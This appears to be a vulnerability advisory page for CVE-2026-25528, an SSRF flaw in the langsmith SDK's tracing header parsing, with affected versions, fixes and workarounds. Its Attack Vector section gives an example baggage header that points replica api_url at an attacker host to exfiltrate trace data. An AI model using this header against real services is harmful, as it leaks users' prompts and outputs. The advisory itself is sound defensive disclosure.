CVE-2026-25528 — langsmith
MEDIUMCVE-2026-25528 is a medium-severity (CVSS 5.8) Server-Side Request Forgery (SSRF) vulnerability in langsmith. A fix is available for langsmith — see the affected versions and patch details below.
LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection
Exploitation Status
No confirmed exploitation observed yet
- CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.
- CISA’s own triage has not observed active exploitation or public proof-of-concept code for this CVE as of its last assessment.
Exploitation and automatability from CISA’s SSVC triage for CVE-2026-25528.
EPSS Exploitation Probability
Probability of exploitation in the next 30 days, from FIRST.org EPSS.
How urgent is this, really
Where this sits among everything scored
Real-World Exposure
How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.
langsmithnpmDescription
Summary
The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.
Description
When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.
Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.
Attack Vector
-
Attacker sends an HTTP request to a vulnerable service with a malicious
baggageheader:baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}] -
The service parses the header via
RunTree.from_headers(), storing the attacker's URL -
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to
https://attacker.com/exfil
Impact
- Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
- SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services
Affected Use Cases
Applications are vulnerable if they:
- Use
TracingMiddlewareto automatically propagate tracing context - Call
RunTree.from_headers()/RunTree.fromHeaders()with untrusted HTTP headers
Remediation
Update to the patched versions:
- Python:
pip install langsmith>=0.6.3 - JavaScript:
npm install langsmith@>=0.4.6
The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.
Workarounds
If unable to upgrade immediately:
- Strip or validate the
baggageheader before passing tofrom_headers() - Do not use
TracingMiddlewarewith untrusted traffic
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | langsmith | ≥ 0.3.41&&< 0.4.6 | 0.4.6npm install langsmith@0.4.6 |
| 🐍PyPI | langsmith | ≥ 0.4.10&&< 0.6.3 | 0.6.3pip install --upgrade 'langsmith==0.6.3' |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for langsmith, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update langsmith to 0.4.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-25528 is resolved across your whole dependency graph.
Workarounds
Restrict outbound requests from the affected component to an allowlist of hosts, block access to link-local and internal address ranges at the network layer, and require authentication on internal services so a forged request cannot reach them unauthenticated.
Frequently Asked Questions
Is CVE-2026-25528 in your dependencies?
Find it across npm, PyPI, including transitive dependencies.